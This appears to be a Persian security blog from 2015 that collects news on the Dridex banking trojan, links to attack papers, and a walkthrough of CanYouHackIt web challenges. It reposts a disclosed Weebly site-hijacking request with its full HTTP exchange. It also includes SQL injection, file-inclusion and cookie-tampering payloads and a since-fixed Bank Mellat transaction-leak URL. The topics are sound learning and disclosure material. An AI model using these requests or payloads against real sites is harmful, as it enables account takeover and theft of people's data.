محلی برای اجتماع تمامی متخصصان و علاقه‌مندان به زبان‌برنامه‌نویسی پایتون از سراسر ایران


یک رویداد منحصر به فرد

کنفرانس پایتون ایران یک رویداد منحصر به قرد است که در آن علاقه‌مندان و متخصصان در یک روز گردهم می‌آیند تا دانش خود را با یکدیگر به اشتراک بگذارند.

 

یک روزِ علمی

در این روز متخصصان به ارایه مطالب متنوع در زمینه‌ی پایتون به صورت تئوری و عملی می‌پردازند

 

سخنرانانی از تمام کشور

این کنفرانس یک برنامه‌ی علمی است از طرف جامعه برای جامعه. افرادی از سراسر ایران در این برنامه حضور خواهند داشت و این فرصتی است مناسب برای تعامل بیشتر با کسانی کهشبیه به ما هستند.

برای شرکت در کنفراس باید چکار کنیم؟
چرا باید برای شرکت در کنفراس ثبت‌نام کنیم؟

اولین نکته این است که شرکت در کفرانس برای عموم آزاد و رایگان است، این به آن مفهوم است که شما نیازی به پرداخت هیچ هزینه‌ای برای شرکت در کنفرانس نخواهید داشت اما برای شرکت در این کنفرانس نیاز است تا ابتدا ثبت‌نام کنید. به دلیل محدویدت مکان، تخمین تعداد شرکت‌کنندگان و همینطور تهیه‌ی گواهی شرکت در کنفرانس، نیاز است تا برای حضور در این کنفرانس از قبل ثبت‌نام کرده باشید.

http://pycon.ir

9روز دیگه است !

از بچه های اینجا اگه کسی میخواد بیاد هماهنگ کنیم باهم بریم

  • ۰ نظر
  • ۰۱ ارديبهشت ۹۴ ، ۱۴:۰۸
  • ۲۶۲ نمایش

‪ گزارش DBIR 2015 ‬

۰۱
ارديبهشت

گزارش سالانه Verizon با عنوان DBIR 2015 منتشر شده که بر اساس اطلاعات بیش از 80000 حادثه امنیتی و بیش از 2000 نفوذ منجر به سرقت اطلاعات تولید شده است.

خلاصه ای از مهم ترین نتایج گزارش در اینجا ذکر شده، از جمله:

    برای بیش از نیمی از آسیب پذیری ها، فاصله زمانی بین انتشار آسیب پذیری و اکسپلویت شدن آن به صورت عمومی در سال 2014 همیشه کمتر از 1 ماه بوده است.
    نفوذ به پایانه های فروش (POS) بیشترین درصد حملات منجر به سرقت اطلاعات را شامل می شود.


لینک اول

لینک میرور

لینک منبع

  • ۰ نظر
  • ۰۱ ارديبهشت ۹۴ ، ۱۳:۵۸
  • ۱۲۹ نمایش

تولدم مبارک

۰۱
ارديبهشت
امروز تولدمه اصلا هم روز خوبی نیست!
  • ۱ نظر
  • ۰۱ ارديبهشت ۹۴ ، ۱۳:۰۲
  • ۱۱۵۲ نمایش

سلام

نمیدونم در جریان این پیکار بودید یا نه در هر صورت جواب این مسابقه رو دادن که توضیحات جالبی داره


لینک پیکار

لینک ویدیو

  • ۰ نظر
  • ۰۱ ارديبهشت ۹۴ ، ۱۳:۰۱
  • ۱۱۳ نمایش

سلام

صحبت های جالبی میشه من 3 تا شو دیشب دیدم که لینک میزارم :

 

Nsa چگونه به اعتماد جهان خیانت کرد!

 

nkib_mikko_hypponen_how_the_nsa_betrayed

 

لینک دانلود

 

 

اپراتور های تلفن همراه شما را زیر نظر دارند

 

dev5_malte_spitz_your_phone_company_is_w

 

اولین باریه که میبینم یه نفر با اینکه لکنت داره سخنرانی میکنه !

لینک دانلود

 

هکرها سیستم ایمنی اینترنت هستند

 

3saq_keren_elazari_hackers_the_internet_

 

لینک دانلود

  • ۱ نظر
  • ۳۱ فروردين ۹۴ ، ۱۴:۵۰
  • ۱۴۵ نمایش


بدافزارنویسان حدود یک دهه قبل از ماکروها برای انتشار بدافزارهای خود سوء استفاده می کردند. ولی هنگامی که شرکت مایکروسافت اقدام به محدود کردن امکان اجرای ماکرو در مجموعه نرم افزارهای Office نمود، بدافزارنویسان نیز به تدریج این روش را کنار گذاشته و آنرا فراموش کردند. ولی اکنون به نظر می رسد که این روش قدیمی برای انتشار بدافزار ، مجددا مورد توجه آنها قرار گرفته است.

به گزارش وب سایت Threatpost، بدافزار Dridex که به تازگی توسط Proofpoint شناسایی شده است، سعی می کند تا داده های کاربران را هنگام ورود به حساب بانکی آنلاین آنها به سرقت ببرد. این بدافزار جانشین قطعه بدافزاری به نام Cridex و از خانواده ی بدافزار GameOver Zeus است که حساب های بانکی را هدف قرار می دهد. البته تفاوت این دو بدافزار در نحوه آلوده ساختن رایانه ها می باشد. بدافزار Dridex خودش را در قالب یک ماکرو که در اسناد واژه پرداز مایکروسافت قرار دارد و از طریق یک هرزنامه ارسال می کند.


همچنین مطابق گزارش وبگاه امنیتی ترندمیکرو؛ مشکل اصلی زمانی رخ می‌دهد که ماکرو ماهیت اصلی خود را نشان می‌دهد. کاربر ترغیب می‌شود تا ماکرو ‌را فعال کرده و ضمیمه آن را باز نماید. زمانیکه کاربر این کار را انجام بدهد، با صفحه سفیدی مواجه می‌شود و همه چیز برای او عادی به نظر می رسد.


اما هنگامیکه سند حاوی بدافزار Dridex بسته ‌شود، عمل اکسپلویتینگ یا بهره برداری از سیستم قربانی رخ می‌دهد و ماکروی مخرب اجرا می گردد و بدافزار بر روی سیستم قربانی بارگیری و اجرا می شود. بعد از اجرای بدافزار، تمامی فعالیت های مرتبط به بانکداری آنلاین کاربر مشاهده می شود. پیکربندی فایل ها شامل یک لیست از بانک های اروپایی است که نام برخی از آنها در لیست زیر آورده شده اند.

Bank of Scotland
Lloyds Bank
Danske Bank
Barclays
Kasikorn Bank
Santander
Triodos Bank



به گزارش ترندمیکرو، اگر کاربر وارد این وب سایت های بانکی شود، بدافزار موضوع را شناسایی کرده و با استفاده از روش هایی مانند Grabbing، عکس انداختن از صفحه نمایش ها و تزریق به سایت های مذکور، اطلاعات بانکی او را به سرقت می برد.
دور زدن مکانیزم های امنیتی

مطابق گزارش پژوهشگران Proofpoint؛ معمولا از اکثریت بدافزار‌ها انتظار می رود که در اولین فرصت بدست آمده در سیستمِ کاربرِ هدف اجرا شود.

با توجه به آنکه اجرای سریع برای ضدبدافزار‌ها و جعبه های شنی به منزله یک پرچم قرمز محسوب می‌شود، بدافزارنویسان Dridex برنامه‌های خود را طوری کدنویسی و طراحی کرده‌اند که قبل از اجرا شدن برای مدت زمان مشخصی منتظر بماند (Sleep Mode)، با استفاده از این تکنیک، می‌توان از جعبه شنی ‌هایی که فعالیت‌ های مخرب را فقط در زمان اجرا بررسی می‌کنند، جان سالم به در برد. استفاده از تکنیک Sleep Mode در طراحی بدافزارها، جزو تکنیک های قدیمی به شمار می رود که بدافزارنویسان از آن برای دور زدن جعبه های شنی استفاده می کردند.

پژوهشگران Proofpoint افزودند؛ دادن اجازه ی اجرا به ماکرو‌ها، کاری خطرناک است و باتوجه به اینکه بدافزارنویسان همواره از روش‌های خلاقانه استفاده کرده و ابزار‌ها و تکنیک‌های جدید‌تری را به کار می‌بندند، اجراشدن ماکرو‌ها روز به روز خطرناکتر خواهد شد. همچنین به گزارش ترندمیکرو، هرزنامه های حاوی این بدافزار، اغلب از کشورهای ویتنام، تایوان، کره جنوبی و چین برای قربانیان فرستاده می شوند.

علاوه بر این، بر پایه بازخورد Smart Protection Network، کاربران در کشور استرالیا و به دنبال آن در انگلیس و آمریکا بیشترین درصد آلودگی به بدافزار Dridex را دارا هستند.
منابع

https://www.proofpoint.com/us/threat-insight/post/Run-on-Close-Macros-Try-to-Shut-the-Door-on-Sandboxes
https://threatpost.com/latest-dridex-campaign-evades-detection-with-autoclose-function/111743
http://blog.trendmicro.com/trendlabs-security-intelligence/banking-trojan-dridex-uses-macros-for-infection/

گزارش میلاد کهساری الهادی

  • ۰ نظر
  • ۲۷ فروردين ۹۴ ، ۰۱:۱۶
  • ۱۴۱ نمایش

Identifier based XSSI attacks

۲۷
فروردين

Article Format : PDF
Present Year : 2015
Language : English
Author(s) : Takeshi Terada
Pages : 16
Size : 408 KB

Abstract :

    Table of Contents :
    Attack techniques/vulnerabilities :
       Simple IE's bug leaks runtime errors
       JSON and other data theft using UTF-16
       Harmony proxy bug in Firefox/Chrome
       Exhaustive search
       CSV with quotations theft

لینک 1

لینک 2


  • ۰ نظر
  • ۲۷ فروردين ۹۴ ، ۰۱:۰۰
  • ۱۳۰ نمایش

فعلا هیچ گزارش یا مقاله یا آنالیزی در این مورد ندیدم فقط میدونم باید پچ کنید :))


https://technet.microsoft.com/library/security/MS15-034
https://support.microsoft.com/en-us/kb/3042553
  • ۰ نظر
  • ۲۶ فروردين ۹۴ ، ۱۱:۵۷
  • ۳۴۹ نمایش

توضیحات :

Link: https://www.weebly.com

Hello there,

I found a severe bug on Weebly.com that can hijack any website from weebly.com by just adding an administrator to their website.

Here’s how I found it:

1st Weebly Account(On Main Browser Tab): Weebly site that I used to add an editor(administrator) to 2nd account.

2nd Weebly Account:(On Incognito): Target

2nd Weebly Account Details:

    ohhyeahphfudge.weebly.com
    owner_id: 47812623
    site_id: 367503762921888574

First, Add an Editor.

Here’s the HTTP Request:

POST /api/JsonRPC/Editor/ HTTP/1.1
Host: www.weebly.com
Proxy-Connection: keep-alive
Content-Length: 247
Accept: application/json, text/javascript
Origin: http://www.weebly.com
X-Requested-With: XMLHttpRequest
x-wtok: [Removed]
Content-Type: application/json; charset=UTF-8
Referer: http://www.weebly.com/weebly/main.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: [Removed]

{"jsonrpc":"2.0","method":"Contributor::createMultiple","params":[{"role":"admin","email":"huehuehuehue10+weebly@gmail.com","message":"HiJacking Weebly websites","restrict_pages":false,"owner_id":"47812623","site_id":"367503762921888574"}],"id":0}

I already changed the value of ‘owner_id’ and ‘site_id’ to target’s owner and site id.

Here’s the HTTP Result:

HTTP/1.1 200 OK
Date: Sun, 22 Feb 2015 08:29:26
GMT Server: Apache
Vary: Cookie,Accept-Encoding,User-Agent
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Host: app-64-16.intern.weebly.net
X-UA-Compatible: IE=edge,chrome=1
Content-Length: 602
Content-Type: application/json
X-W-DC: SFO

{"jsonrpc":"2.0","id":0,"method":"Contributor::createMultiple","result":{"success":true,"models":[{"id":"invitation-596276730608950492","pending":true,"owner_id":"47812623","user_id":null,"site_id":"367503762921888574","email":"huehuehuehue10+weebly@gmail.com","last_login":false,"role":"admin","display_role":"Administrator","invitation_id":"596276730608950492","invitation_used":null,"invitation_retracted":null,"message":"HiJacking Weebly websites","restrict_pages":false,"allowed_pages":[],"allow_publish":true,"allow_stats":true,"allow_form_entries":true,"allow_blog_comments":true}],"errors":[]}}

Here’s the proof that the Invitation has been sent and received in my email:



Here’s the proof that the Invitation has been successfully added to Target’s Site Editors List



For Video Demonstration:

لینک ویدیو

Timeline:

    2015-02-22 17:47:00 – I reported this bug on http://hc.weebly.com/ with Request #1655632.
    2015-02-26 04:56:00 – Dave S. of Weebly emailed me that the bug has been rectified and should no longer pose a threat.

  • ۰ نظر
  • ۲۴ فروردين ۹۴ ، ۱۸:۰۱
  • ۱۶۱ نمایش


چکیده :

تاریخچه کشف اولین نوع از آسیب پذیری های اسکریپت نویسی فراوبگاهی  یا به ترجمه اشتباه تزریق کدهای اسکریپتی به برنامه های کاربردی تحت وب، به اوایل سال 1996 برمی گردد، زمانیکه روز های اولیه شکل گیری شبکه جهانی وب  به شمار می رفت. نفوذگران در آن زمان که پروتکل HTTP بتازگی در شبکه جا افتاده بود و طراحان وب‌گاه‌ها از زبانهای اسکریپت نویسی مانند جاوااسکریپت سود می‌بردند، دریافتند وقتی کاربران وارد سایتی می‌شوند، می‌توانند به کمک کدنویسی در حفره‌های امنیتی وب‌گاه مقصد (بعدها حفره های امنیتی تزریق اسکریپت نامگذاری شدند)، صفحه دیگری را در همان صفحه بارگذاری کنند و سپس با سود بردن از جاوااسکریپت داده‌های کاربر مانند نام کاربری، گذرواژه و یا کوکی ها  را به سرقت ببرند.

شایان ذکر است، زبان برنامه نویسی جاوااسکریپت را می توان منادی مخفی اسکریپت نویسی فرابگاهی دانست. این موضوع توانست منظره امنیت برنامه های تحت وب را برای همیشه عوض کند. در این کتاب که شما پیش روی خود دارد با این ضعف امنیتی به صورت کامل آشنا خواهید شد.


سرفصل کتاب :

  1. فرازی از سخن های رهبر انقلاب اسلامی    5
  2. مقدمه نویسنده، میلاد کهساری الهادی    7
  3. نکته ای درباره واژگان تخصصی    10
  4. فصل اول : مفاهیم اساسی اسکریپت نویسی فراوبگاهی (XSS)    11
    1. مقدمه ای بر آسیب پذیری اسکریپت نویسی فراوبگاهی    12
    2. امنیت در برنامه های تحت وب    16
    3. معرفی XML و AJAX    18
  5. فصل دوم : تئوری آسیب پذیری اسکریپت نویسی فراوبگاهی    26
    1. مقدمه ای بر تئوری اسکریپت نویسی فراوبگاهی    27
    2. آشنایی با اسکریپت نویسی فراوبگاهی    27
    3. حمله اسکریپت نویسی فراوبگاهی غیرماندگار    29
    4. حمله اسکریپت نویسی فراوبگاهی مبتنی بر  مدل شی سند    32
    5. حملات اسکریپت نویسی فراوبگاهی ماندگار    34
    6. حمله XSS مبتنی بر  مدل شی سند با جزئیات    35
    7. شناسایی ضعف امنیتی اسکریپت نویسی فراوبگاهی مبتنی بر DOM    36
    8. اکسپلویت کردن ضعف امنیتی XSS مبتنی بر DOM غیرماندگار    40
    9. اکسپلویت کردن ضعف امنیتی XSS مبتنی بر DOM ماندگار    42
    10. جلوگیری از ضعف های امنیتی XSS مبتنی بر DOM    44
    11. تغییر مسیر    47
    12. سرویس های تغییرمسیر دهنده    50
    13. آدرس های ارجاع دهنده     51
    14. حمله جعل درخواست فرا وب گاهی (CSRF)    53
    15. فایل های Flash, Quicktime, PDF    58
    16. بازی با آتش Flash    58
    17. ویژگی های مخفی PDF    66
    18. هک QuickTime    78
    19. درهای پشتی فایل های عکس    82
    20. تزریق پاسخ HTTP    84
    21. کد منبع در مقابل واقعیت DHTML    86
    22. دور زدن محدودیت طول XSS    91
    23. گریز از فیلتر XSS    93
    24. هنگامیکه اسکریپت بلاک می شود    99
  6. فصل سوم : روش های حمله مبتنی بر XSS    108
  7. درآمدی بر روش های حمله مبتنی بر XSS    109
  8. سرقت تاریخچه    109
  9. JavaScript/CSS API “getComputedStyle”
  10. سرقت پرس و جوی های موتورهای جستجو    112
  11. بررسی کننده خطای ورود کنسول جاوااسکریپت    113
  12. هک اینترانت    121
  13. روند اکسپلویت کردن شبکه قربانی    122
  14. کنترل ماندگار    122
  15. بدست آوردن آدرس های IP برای رابط NAT    123
  16. پویش درگاه    124
  17. شناسایی کورکورانه وب سرور    128
  18. حمله به اینترانت    129
  19. دیفیس کردن مبتنی بر XSS    132

تعداد صفحات : 130 صفحه

نویسنده : میلاد کهساری الهادی

لینک دانلود مستقیم


لینک دانلود 2

پسورد برای لینک دوم:

myfreetime.ir
  • ۰ نظر
  • ۲۲ فروردين ۹۴ ، ۱۲:۲۴
  • ۱۳۰ نمایش

سلام

در این پست قصد دارم چالش های وب سایت CanYouHackIt را حل کنم.

شماره اول :

عنوان :
Can you GET this one
متن مربوط به چالش :
An easy target located...
لینک چالش
خب وقتی روی لینک سوال کلیک میکنیم آدرس ما به این صورت هست :
http://canyouhack.it/Content/Challenges/Web/Web1.php?Page=Guest
در صفحه ی سوال با متن زیر رو ب رو میشویم :
Welcome Guest to our very basic site
کافیه که بجای کلمه ی Guest کلمه ی Admin را جایگزاری کنیم.

شماره دوم :
عنوان :
The way this challenge crumbles
متن مربوط به چالش :
An easy target located...
لینک چالش
خب وقتی روی لینک سوال کلیک میکنیم آدرس ما به این صورت هست :
http://canyouhack.it/Content/Challenges/Web/Web2.php
در صفحه ی سوال با متن زیر رو ب رو میشویم :
Welcome Guest after being hacked we decided GET request wasn't the best way to set user rights
همانطور که در آدرس سوال میبینید هیچ پارامتری از طریق متد GET ارسال نمیشود خب پس نگاهی به پارامترهای POST میاندازیم من از افزونه ی Tamper Data فایرفاکس استفاده میکنم :

خب محتویات پارامتر Cookie به این صورت است :
isAdmin=0; _ga=GA1.2.1834574024.1427374043; SMFCookie416=a%3A4%3A%7Bi%3A0%3Bs%3A5%3A%2266157%22%3Bi%3A1%3Bs%3A40%3A%22d48ae5505f430fc3bed98ddae1d9c5a0885e3771%22%3Bi%3A2%3Bi%3A1616595606%3Bi%3A3%3Bi%3A0%3B%7D; PHPSESSID=guq01or2mgakmdupkcrh8upkc5
کافیه که عدد جلوی متغیر isAdmin را به 1 تغییر دهیم.

شماره سوم :
عنوان :
Take us to your leader
متن مربوط به چالش :
An invasion?
لینک چالش
خب وقتی روی لینک سوال کلیک میکنیم آدرس ما به این صورت هست :
http://canyouhack.it/Content/Challenges/Web/Web3.php
در صفحه ی سوال با متن زیر رو ب رو میشویم :
Robots may not injure a human being or, through inaction, allow a human being to come to harm.
Robots have seen things you people wouldn't believe.
Robots are Your Plastic Pal Who's Fun To Be With.
Robots have shiny metal posteriors which should not be bitten.

And they have a plan.
همانطور که در متن سوال هم ذکر شده کافیه سری به فایل robots.txt بزنید :
http://canyouhack.it/robots.txt
User-agent: * 
Disallow: /Content/Challenges/Web/Web3p.php

شماره چهارم :
عنوان :
Where did you come from :S
متن مربوط به چالش :
Where did you come from :S
لینک چالش
خب وقتی روی لینک سوال کلیک میکنیم آدرس ما به این صورت هست :
http://canyouhack.it/Content/Challenges/Web/Web4.php
در صفحه ی سوال با متن زیر رو ب رو میشویم :
You should always visit google.com
It may be able to refer you to the solution.
همانطور که از متن سوال مشخص هست باید از طریق google.com وارد این چالش بشویم پس کافیه صفحه ی مربوط به سوال را با مقداردهی پارامتر Referer به google.com باز کنیم من برای این کار از افزونه Tamper Data فایرفاکس استفاده کردم


شماره پنجم :
عنوان :
I hate it when the Dr has to do this to me.
متن مربوط به چالش :
Click The Link Below To Edit Profile
لینک چالش
خب وقتی روی لینک سوال کلیک میکنیم آدرس ما به این صورت هست :
http://canyouhack.it/Content/Challenges/Web/Web5.php?SESSION=abf3e2d32ec32
در صفحه ی سوال با یک فرم لاگین با نام کاربری Guest مواجه مشویم خب اولین احتمال در مواجه شدن با یک فرم لاگین تست آسیب پذیری SQLi است پس عبارت منطقی ' or '1'='1' -- ' را به عنوان پسورد وارد میکنیم ولی مثل اینکه این فرم الکی میباشد پس به آدرس برمیگردیم و این عبارت منطقی را در ادامه ی آدرس کنار مقدار متغیر SESSION قرار میدهیم به این صورت :
http://canyouhack.it/Content/Challenges/Web/Web5.php?SESSION=abf3e2d32ec32' or '1'='1' -- '

شماره ششم :
عنوان :
Are you listed?
لینک چالش
خب وقتی روی لینک سوال کلیک میکنیم آدرس ما به این صورت هست :
http://canyouhack.it/Content/Challenges/Web/Web6.php?File=Files6/Welcome.txt
در صفحه ی سوال با متن زیر رو ب رو میشویم :
Welcome To Our Home Page
خب همانطور که از آدرس سوال پیداست این صفحه ی دارای آسیب پذیری LFI یا Local File Inclusion است اما ما قادر به حدس زدن فایلی که حاوی پسورد مربوط به مرحله ی ششم است را نداریم! حال نگاهی به دایرکتوری Files6 میاندازیم :
http://canyouhack.it/Content/Challenges/Web/Files6/
محتویات این پوشه حاوی دو فایل با نام های passconfigs.php و welcome.txt است که خب مسلماً فایل passconfigs.php حاوی پسورد است پس این فایل را میخونیم :
http://canyouhack.it/Content/Challenges/Web/Web6.php?File=Files6/passconfigs.php
محتویات مربوط به این فایل :
<?php $Password = 'DirListings'; ?>


شماره هفتم :
عنوان :
It's not listed?
لینک چالش
خب وقتی روی لینک سوال کلیک میکنیم آدرس ما به این صورت هست :
http://canyouhack.it/Content/Challenges/Web/Web7.php
در صفحه ی سوال با متن زیر رو ب رو میشویم :


که با تغییر این کومبو باکس مقدار متغیر Type ما هم با استفاده از متد POST تغییر میکند.کافیه که مقدار متغیر Type را به admin تغییر دهیم.

شماره هشتم :
عنوان :
Are you on the right path?
متن مربوط به چالش :
The password is the full local path of the file
لینک چالش
خب وقتی روی لینک سوال کلیک میکنیم آدرس ما به این صورت هست :
http://canyouhack.it/Content/Challenges/Web/Web8.php?Page=Home
در صفحه ی سوال با متن زیر رو ب رو میشویم :
Home - Contact Us

Welcome To Home Page
همانطوری که از متن عنوان سوال مشخص هست جواب این سوال آدرس یک فایل است پس کافیه در آدرس بالا یک [] کنار متغیر Page بزاریم:
http://canyouhack.it/Content/Challenges/Web/Web8.php?Page[]=Home
با ارسال این آدرس به سرور با این صفحه مواجه میشویم :
php expects parameter 1 string in /var/www/hackit/re/Web8.php on line 15


شماره نهم :
عنوان :
Before sure to check for poison
لینک چالش
خب وقتی روی لینک سوال کلیک میکنیم آدرس ما به این صورت هست :
http://canyouhack.it/Content/Challenges/Web/Web9.php?File=Files9/Welcome
در صفحه ی سوال با متن زیر رو ب رو میشویم :
Welcome To Our Home Page
Problem with file inclusion has now been sorted
خب مشخص هست مثل سوال شماره ششم با استفاده از LFI میبایست فایل های مربوط به دایرکتوری را خواند پس داریم :
canyouhack.it/Content/Challenges/Web/Files9/
محتویات این پوشه حاوی دو فایل با نام های passconfigs.php و welcome.txt است که خب مسلماً فایل passconfigs.php حاوی پسورد است پس این فایل را میخونیم :
http://canyouhack.it/Content/Challenges/Web/Web9.php?File=Files9/passconfigs.php%00
نکته ی سوال هم نال بایت آخر آدرس است

شماره دهم :
عنوان :
You can't tell me where to go!
لینک چالش
خب وقتی روی لینک سوال کلیک میکنیم به صورت خودکار به آدرس اول یعنی CanYouHack.It ریدایرکت میشویم.در نتیجه میبایست جلوی ریدارکت شدن این صفحه را بگیریم.من برای اینکار به اسکریپت ساده پیتون نوشتم :
import urllib.request
response = urllib.request.urlopen('http://canyouhack.it/Content/Challenges/Web/Web10.php')
html = response.read()

print(html)
  • ۰ نظر
  • ۰۶ فروردين ۹۴ ، ۱۹:۴۹
  • ۱۱۵۳ نمایش

سلام

با سایتی مواجه شدم که در چند زمینه سوال و چالش هایی طراحی کرده که فکر میکنم جالب باشه.موضوعات چالش ها :

logic Challenges
Script Challenges
Cryptography Challenges
Steganography Challenges
Crack Challenges
Programming Challenges
Captcha Challenges
Web Based Challenges
Realistic Challenges
Hidden Challenges
Mobile Challenges
Reconnaissance Challenges
Catharissa Challenges


http://canyouhack.it

  • ۰ نظر
  • ۰۶ فروردين ۹۴ ، ۱۹:۳۸
  • ۲۳۷ نمایش

سلام

گویا شخصی به اسم طاها باگی در بانک ملی پیدا کرده که میشه تراکش های مردم را خوند البته این مشکل در حال حاظر حل شده و لینک ها کار نمیکنه

http://epay.bankmellat.ir/EPayment/payment/PaymentMassagePreview.aspx?SaleOrderId=شماره تراکش

http://epay.bankmellat.ir/EPayment/payment/PaymentMassagePreview.aspx?SaleOrderId=1334515


یک نمونه تراکش :


  • ۲ نظر
  • ۰۶ فروردين ۹۴ ، ۰۰:۲۷
  • ۴۱۴ نمایش

 Facebook Malicious Extension Malware Analysis

چکیده :

این مقاله به بررسی توزیع بدافزار اخیر در فیسبوک که خود را در پلاگین مرورگر کروم نصب میکند میپردازد


This paper discusses a recent malware distribution occurring on Facebook that attempts to install a malicious Chrome extension.


لینک یک

لینک دو

  • ۱ نظر
  • ۰۴ فروردين ۹۴ ، ۱۷:۳۲
  • ۲۳۱ نمایش

CVE-2014-4113 Windows Privilege Escalation Analysis

چکیده :

آنالیز آسیب پذیری به CVE-2014-4113 که مربوط به Windows TrackPopupMenu Win32k NULL Pointer Dereference است.

لینک

    Whitepaper that provides an analysis of the Windows privilege escalation vulnerability as noted in CVE-2014-4113.


لینک یک

لینک دو

  • ۰ نظر
  • ۰۴ فروردين ۹۴ ، ۱۷:۲۵
  • ۱۴۳ نمایش

Deep Dive Into ROP Payload Analysis

چکیده :

در این مقاله به تجزیه و تحلیل متد ROP attack که در اکسپلویت ها استفاده میشود میپردازد

    This paper introduces the reader to techniques that can be used to analyze ROP payloads that are used in exploits in the wild.


لینک یک

لینک دو

  • ۰ نظر
  • ۰۴ فروردين ۹۴ ، ۱۷:۱۴
  • ۱۵۸ نمایش

‪ SpoofedMe - Intruding Accounts Using Social Login Providers ‬

چکیده :

دراین مقاله با جعل هویت کاربران در سایت های شخص ثالث با استفاده از اکانت های شبکه های اجتماعی


Abstract

    In this paper, they authors present an implementation vulnerability found in some popular social login identity providers (including LinkedIn, Amazon and Mydigipass.com) and show how this vulnerability allowed them to impersonate users of third-party websites.

لینک یک

لینک دو

  • ۰ نظر
  • ۰۴ فروردين ۹۴ ، ۱۷:۰۶
  • ۱۷۸ نمایش

به مناسبت عید نوروز ثبت نام در فروم پی سی وان تا 13 فروردین ماه باز میباشد.
بچه های امنیت کار ثبت نام کنید
http://pcone.us

  • ۰ نظر
  • ۰۳ فروردين ۹۴ ، ۲۱:۳۹
  • ۱۵۱ نمایش

چکیده :

کلمه cryptography برگرفته از لغات یونانی به معنای محرمانه نوشتن متون است.از آنجا که بشر همیشه چیزهایی برای مخفی کردن داشته است.رمزنگاری برای مخفی کردن اطلاعات قدمتی برابر عمر بشر دارد از پیغام رساندن با دود تا رمزنگاری سراز،رمزهای جایگشتی و روش های متنوع دیگر.رمز نگاری علم کدها و رمزهاست.یک هنر قدیمی است برای قرن ها به منظور محافظت از پیغام هایی که بین فرمانهان،جاسوسان،عشاق و دیگران رد و بدل شده استفاده شده است.
هنگامی که با امنیت داده ها سرو کار داریم،نیاز به اثبات هویت فرستنده و گیرنده پیغام داریم و در ضمن باید از عدم تغییر محتوای پیغام مطمن شویم.این سه موضوع یعنی،محرمانگی،تصدیق هویت و جامعیت در قلب امنیت ارتباطات داده های مدرن قرار دارند و میتوانند از رمزنگاری استفاده کنند اغلب این مسله باید تضمین شود که یک پیغام فقط میتواند توسط کسانی خوانده شود که پیغام برای آنها ارسال شده است و دیگران این اجازه را ندارند،روشی که تامین کننده این مسله باشد رمزنگاری نام دارد،رمزنگاری هنر نوشتن به صورت رمز است به طوریکه هیچکس به غیر از دریافت کننده مورد نظر نتواند محتوای پیغام را بخواند.

لینک دانلود

  • ۰ نظر
  • ۰۲ فروردين ۹۴ ، ۱۹:۵۹
  • ۱۷۰ نمایش

درود،

 

در این مقاله بنا به درخواست یکی از دوستان و ارسال فایل Crackme در مورد روش حل CrackMe 250 مسابقات اخیر ctf شریف بحث میکنیم.

 

لینک دانلود مقاله 10Pages / Full Archive 8.77MB:


لینک یک

لینک دو

  • ۲ نظر
  • ۰۲ فروردين ۹۴ ، ۱۹:۴۴
  • ۲۶۸ نمایش

توی این آموزش یه برنامه که دارای محدودیت زمانی و اجرایی هست .با کمک یک API MONITOR کرک میشه.


لینک دانلود

منبع

  • ۱ نظر
  • ۰۲ فروردين ۹۴ ، ۱۹:۴۲
  • ۱۸۹ نمایش

در این مقاله با انواع روش های دور زدن فایروال های تحت وب آشنا میشوید

چکیده ای از مقاله :

چکیده :

WAF چیست ؟
WAF ها با چه متدهایی کار میکنند ؟
قوانین فیلتر WAF
انواع راه های بایپس
درهم سازی جاوااسکریپت
درهم سازی SQL
معرفی ابزار برای درهم سازی

لینک دانلود

  • ۰ نظر
  • ۰۲ فروردين ۹۴ ، ۱۸:۱۵
  • ۱۷۱ نمایش

مقاله ای در رابطه با پایه ی حملات سریز بافر

عناوین :

So What's a buffer overflow, after all?
Programs, Libraries and binaries
The Threat
Basic of computer architecture
Memory Organization
Code
Data and BSS
Stack
Heap
Smashing the stack
Exploitation Technique
Countermeasures
Software Development
Tools and Technical means
Software users
OFF-BY-ONE or FRAME POINTER Overwrite buffer overflows
Exploitation Technique
Countermeasures
RETURN-INTO-LIBC buffer overflows
Exploitation Technique
Countermeasures
Heap Overflows
Exploitation Technique
Countermeasures

تعداد صفحات : 29

نویسنده : infoSec

لینک دانلود

  • ۰ نظر
  • ۰۲ فروردين ۹۴ ، ۱۷:۵۷
  • ۱۷۵ نمایش

در این مقاله که بیشتر شبیه به پرسنت هست با حملات نسل دوم وب آشنا میشویم که البته این مقاله توضیحات کوتاهی داده در واقع خط داده و مطالعه تخصصی بروی انواع حملات به عهده ی خود ماست.


عناوین مقاله :

Web 2.0 attack surface and trends
SOA/Web 2.0/Web Services - Injections
Reverse Engineering Attack Vectors and Hacks
CSRF Pollution and Attacks
HTML 5 - new exposure on the rise
Conclusion

تعداد صفحات : 50

نویسنده : Shreeraj Shah

لینک دانلود


  • ۰ نظر
  • ۰۲ فروردين ۹۴ ، ۱۷:۲۷
  • ۱۳۴ نمایش

چکیده ای از مقاله :

فناوری Mailslot ویندوز مایکروسافت، یک فناوری جدید نیست، اما اولین بار است که یک بدافزار از نوع بدافزارهای پایانه فروش با نام LogPOS از آن سوء استفاده می کند. در شبکه توسعه دهندگان مایکروسافت در رابطه با این فناوری آورده شده است؛ یک Mailslot مکانیزم ارتباطی بین پردازشی است که اجازه می دهد برنامه های کاربردی پیام های خود را در آن ذخیره کرده و مالک Mailslot آن پیام ها را بازیابی کند. این پیام ها معمولا از طریق یک شبکه به یک کامپیوتر مشخص یا به تمامی کامپیوترهای موجود در یک دامنه ارسال می شوند.

در انواع مختلف بدافزارهای پایانه ی فروش، یک فرایند، حافظه دیگر فرآیندها را کندوکاو کرده و اطلاعات رهگیری شده را در یک فایل (log) نگاشت می کند. از آنجاییکه LogPOS به درون فرآیندهای مختلف شلکد (shellcode) تزریق می کند و هر یک از آنها حافظه فرآیند خودشان را جستجو می کنند، بدافزار LogPOS می تواند یک فایل مشخص را برای ذخیره سازی اطلاعات کشف شده مورد استفاده قرار دهد، چرا که تمامی آن فرآیندها نمی توانند در یک لحظه فایلی را با سطح دسترسی نوشتن باز کنند. به منظور رفع این محدودیت بدافزار LogPOS از فناوری Mailslot استفاده می کند.


لینک دانلود

منبع

  • ۰ نظر
  • ۰۲ فروردين ۹۴ ، ۱۶:۵۱
  • ۱۳۶ نمایش

سال جدید

۰۱
فروردين


